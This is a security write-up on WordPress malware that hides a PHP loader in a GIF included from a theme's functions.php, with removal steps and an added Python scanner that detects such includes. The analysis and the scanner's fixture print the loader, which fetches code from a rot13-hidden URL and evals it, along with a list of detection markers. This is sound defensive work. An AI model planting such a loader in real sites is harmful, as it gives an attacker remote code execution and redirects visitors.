We have found a new type of WordPress malware that redirects only URLs under certain path hierarchies to Russian mail-order sites. Below is an example of this malware and how to remove it.
Characteristics of WordPress malware
The malware is characterized by redirecting all pages below a specific WordPress hierarchy, such as example.com/en/ or example.com/jp/, to malicious sites on Russian domains.
For example, visitors were redirected to malicious sites such as the following (URL defanged):
http://www[.]hacopy[.]ru/
Malware location
This malware is a malicious PHP program disguised as a GIF or JPG image. We found it loaded from the theme's functions.php with the following line:
include("images/qaI.gif");
What makes this malware effective is the split: the code itself sits in a file with a .gif or .jpg extension, while the line that loads it is a short, unobfuscated include() that looks like ordinary theme code. A scanner that only inspects .php files, or that looks for obfuscated blobs, sees nothing suspicious in functions.php and never opens the image.
The code of the malware disguised as a gif or jpg is as follows.
error_reporting(0); $a = @file_get_contents(str_rot13('uggc://***********/').' all/*********/xmlr'); eval('?>'. $a);
This loader fetches code from an external URL with file_get_contents and hands the response to eval. The URL is hidden only by str_rot13 (uggc:// decodes to http://); the host and path are redacted above. Prefixing the payload with ?> closes PHP mode so the downloaded code can start with its own <?php tag, and error_reporting(0) together with the @ operator suppresses any warning if the download fails. The redirect logic therefore lives on the attacker's server, not in the file on disk: the disguised image contains no redirect strings to match on, and the attacker can change what runs on the site without touching it again. This is what was producing the unauthorized redirects.
How to deal with malware
You can deal with this malware in the following ways
1 Detect the malicious include of a PHP-bearing GIF or JPG with a malware scanner plugin. The scanner must flag include/require statements whose target is an image file and then inspect that file for PHP code, since neither the include line nor the image is suspicious on its own.
[Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].
2 Once the malicious include is detected, note the path it loads (here images/qaI.gif, relative to the theme directory), connect to the server with FTP/SFTP or a shell, delete the disguised image file, and remove the include line from functions.php.
Do both in the same change: deleting the file but leaving the include() makes PHP emit a warning on every page load, while removing only the include line leaves the payload on disk, ready to be wired back in. Afterwards, search the rest of the installation (other themes, plugins, wp-content/uploads) for include or require statements that point at non-PHP files, since the same loader may have been planted in more than one place.
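The following is an added example, not code from this page or from the scanner plugin above, showing the detection and remediation pairing described in steps 1 and 2: it walks a theme directory, flags include/require statements that load image files, checks whether those images carry PHP markers, decodes any str_rot13 literals to expose the download URL, and lists the two removal steps together. The function names and the fixture are hypothetical; build_sample_site() constructs a throwaway theme mirroring the page, and its rot13 host is a placeholder that decodes to example.invalid because the real host was redacted.

```python
"""Added example (not the page's plugin): find include/require of image files,
inspect the target for PHP, and decode str_rot13 literals to expose the download URL."""
import codecs
import os
import re
import tempfile

# include/require (with or without parentheses) whose target has an image extension
INCLUDE_RE = re.compile(
    r"""\b(include|require)(_once)?\s*\(?\s*['"]([^'"]+\.(?:gif|jpe?g|png|ico))['"]""",
    re.IGNORECASE,
)
# Strings that should never appear inside a real image; any hit means the file carries code.
PHP_MARKERS = ("<?php", "eval(", "file_get_contents(", "str_rot13(", "base64_decode(", "gzinflate(")
ROT13_LITERAL_RE = re.compile(r"str_rot13\(\s*'([^']*)'\s*\)")


def find_suspicious_includes(php_source):
    """Return (line_number, keyword, target_path) for every include/require of an image file."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in INCLUDE_RE.finditer(line):
            hits.append((lineno, m.group(1).lower(), m.group(3)))
    return hits


def decode_rot13_literals(data):
    """Decode every str_rot13('...') literal; the loader hides its download URL this way."""
    return [codecs.decode(s, "rot13") for s in ROT13_LITERAL_RE.findall(data)]


def inspect_payload(data):
    """Report which code markers an 'image' contains and any rot13-hidden strings."""
    return {"markers": [m for m in PHP_MARKERS if m in data],
            "decoded": decode_rot13_literals(data)}


def scan_tree(root):
    """Walk a theme/plugin directory and pair each suspicious include with the file it loads.
    Relative targets are resolved against the including file's directory, which is how PHP
    resolves them when they are not found on include_path (a heuristic, good enough here)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            loader = os.path.join(dirpath, name)
            with open(loader, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            for lineno, keyword, target in find_suspicious_includes(source):
                payload = os.path.normpath(os.path.join(dirpath, target))
                finding = {"loader": loader, "line": lineno, "keyword": keyword,
                           "payload": payload, "exists": os.path.isfile(payload),
                           "markers": [], "decoded": []}
                if finding["exists"]:
                    with open(payload, encoding="utf-8", errors="replace") as fh:
                        finding.update(inspect_payload(fh.read()))
                findings.append(finding)
    return findings


def remediation_steps(finding):
    """Both steps belong in one change: drop the file AND the line that loads it."""
    return [f"delete {finding['payload']}",
            f"remove line {finding['line']} ({finding['keyword']} of {finding['payload']}) "
            f"from {finding['loader']}"]


def build_sample_site():
    """Constructed fixture mirroring the page: functions.php includes images/qaI.gif.
    The rot13 host is a placeholder (decodes to example.invalid); the real one was redacted."""
    root = tempfile.mkdtemp(prefix="wp-theme-")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "functions.php"), "w") as fh:
        fh.write("<?php\nadd_theme_support('post-thumbnails');\ninclude(\"images/qaI.gif\");\n")
    with open(os.path.join(root, "images", "qaI.gif"), "w") as fh:
        fh.write("<?php error_reporting(0); "
                 "$a =@file_get_contents(str_rot13('uggc://rknzcyr.vainyvq/').'all/x/xmlr'); "
                 "eval('?>'. $a);\n")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_site()):
        print(f"{f['loader']}:{f['line']} {f['keyword']} -> {f['payload']} "
              f"(exists={f['exists']}, markers={f['markers']}, decoded={f['decoded']})")
        for step in remediation_steps(f):
            print("  *", step)
```

Point scan_tree() at wp-content/themes or wp-content/plugins on a real install; an include whose target exists and shows markers such as eval( or str_rot13( is the pattern from this page, while a target that does not exist is usually the leftover of a half-finished cleanup that is now producing PHP warnings.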